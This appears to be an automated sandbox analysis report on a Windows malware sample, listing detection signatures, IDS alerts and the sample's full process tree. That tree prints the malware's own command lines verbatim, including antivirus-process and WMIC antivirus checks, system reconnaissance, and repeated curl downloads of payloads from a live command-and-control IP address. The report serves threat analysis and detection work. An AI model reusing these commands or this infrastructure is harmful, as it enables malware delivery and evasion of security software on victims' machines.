Edit tour
Windows
Analysis Report
vqMMwqCFZQ.exe
Overview
General Information
Sample name: | vqMMwqCFZQ.exe (renamed file extension from none to exe, renamed because original name is a hash value) |
Original sample name: | 5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887 |
Analysis ID: | 1560430 |
MD5: | 8e55a7932d1b9649aba9d3e97ca688ce |
SHA1: | 32afffa80d0f8778c8670f1b9996c602a81de455 |
SHA256: | 5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887 |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Too many similar processes found
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- vqMMwqCFZQ.exe (PID: 3496 cmdline:
"C:\Users\ user\Deskt op\vqMMwqC FZQ.exe" MD5: 8E55A7932D1B9649ABA9D3E97CA688CE) - cmd.exe (PID: 6024 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Tr ees Trees. bat & Tree s.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5672 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 3488 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 2520 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7004 cmdline:
findstr -I "avastui avgui bdse rvicehost nswscsvc s ophoshealt h" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 2936 cmdline:
cmd /c md 139918 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 6712 cmdline:
findstr /V "SyntaxMi lesImperia lTriple" C redits MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 6164 cmdline:
cmd /c cop y /b ..\As ked + ..\L eaving + . .\During + ..\Chairm an + ..\Br acket + .. \Label + . .\Perhaps v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Ur.pif (PID: 2476 cmdline:
Ur.pif v MD5: 18CE19B57F43CE0A5AF149C96AECC685) - cmd.exe (PID: 3164 cmdline:
"C:\Window s\System32 \cmd.exe" /C WMIC /N ode:localh ost /Names pace:\\roo t\Security Center2 Pa th AntiVir usProduct Get displa yName > C: \Users\use r\AppData\ Local\temp \807 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 5740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6932 cmdline:
WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntiVirusP roduct Get displayNa me MD5: E2DE6500DE1148C7F6027AD50AC8B891) - cmd.exe (PID: 2724 cmdline:
"C:\Window s\System32 \cmd.exe" /C type C: \Users\use r\AppData\ Local\temp \807 > C:\ Users\user \AppData\L ocal\temp\ 237 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1072 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\jr dip" "178. 215.224.25 2/v10/ukyh .php?jspo= 6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 4476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5568 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\jrdip " "178.215 .224.252/v 10/ukyh.ph p?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4480 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\dx jyu" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6692 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\dxjyu " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2484 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\dh mio" "178. 215.224.74 /v10/ukyh. php?jspo=5 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6024 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\dhmio " "178.215 .224.74/v1 0/ukyh.php ?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 1544 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fp rwf" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 2060 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fprwf " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 5368 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\nh rsa" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3916 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\nhrsa " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 6116 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4124 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\rr mou" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=YXp 2dy5leGU%3 D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5932 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\rrmou " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=YXp2dy 5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4308 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fo fqx" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 2104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5448 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fofqx " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 3020 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\zx fdn" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6012 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\zxfdn " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 428 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\gv hdi" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=eGh 3cS56aXA%3 D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 2124 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\gvhdi " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=eGh3cS 56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2836 cmdline:
"C:\Window s\System32 \cmd.exe" /C cd "C:\ Users\user \AppData\R oaming\Dol phinDumps" & azvw.ex e -o xhwq. zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - azvw.exe (PID: 2664 cmdline:
azvw.exe - o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68) - Conhost.exe (PID: 2996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4092 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\ag adw" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 2336 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\agadw " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 5660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2540 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\mn cym" "178. 215.224.74 /v10/ukyh. php?jspo=3 1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6192 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\mncym " "178.215 .224.74/v1 0/ukyh.php ?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6300 cmdline:
"C:\Window s\System32 \cmd.exe" /C systemi nfo | find str /C:"OS Name" > C :\Users\us er\AppData \Roaming\D olphinDump s\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 6416 cmdline:
systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5) - WmiPrvSE.exe (PID: 6660 cmdline:
C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD) - Conhost.exe (PID: 6588 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - findstr.exe (PID: 6528 cmdline:
findstr /C :"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - Conhost.exe (PID: 6440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7052 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\ly vbm" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6264 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\lyvbm " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2008 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\dx mcp" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5828 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\dxmcp " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 5180 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\oq sxp" "178. 215.224.74 /v10/ukyh. php?jspo=7 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5172 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\oqsxp " "178.215 .224.74/v1 0/ukyh.php ?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 5180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 5944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2520 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\hz izi" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4476 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\hzizi " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2756 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\qf mnd" "178. 215.224.74 /v10/ukyh. php?jspo=1 0&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 772 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\qfmnd " "178.215 .224.74/v1 0/ukyh.php ?jspo=10&m elq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 1516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5568 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fb swm" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4280 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fbswm " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 1992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4076 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\ne fne" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6696 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\nefne " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 3520 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\zx jrd" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=UmV 2ZW51ZURld mljZXMuZXh l" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1508 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\zxjrd " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=UmV2ZW 51ZURldmlj ZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - RevenueDevices.exe (PID: 1892 cmdline:
"C:\Users\ user\AppDa ta\Local\t emp\Revenu eDevices.e xe" MD5: B487B5B51436B42576D60A1FE58F8399) - cmd.exe (PID: 5444 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Se ek Seek.cm d & Seek.c md MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 3592 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - cmd.exe (PID: 5068 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fn tgj" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1696 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fntgj " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2104 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\jy ffr" "178. 215.224.74 /v10/ukyh. php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5632 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\jyffr " "178.215 .224.74/v1 0/ukyh.php ?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 5848 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\wb qtj" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 428 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\wbqtj " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 5232 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 2896 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4) - Conhost.exe (PID: 2248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
Spreading |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-21T20:00:35.393060+0100 | 2853767 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-21T20:00:35.393060+0100 | 2853768 | 1 | A Network Trojan was detected | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B | |
Source: | Code function: | 50_2_0041C29C | |
Source: | Code function: | 50_2_004107A0 | |
Source: | Code function: | 86_2_004062D5 | |
Source: | Code function: | 86_2_00402E18 | |
Source: | Code function: | 86_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | ASN Name: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |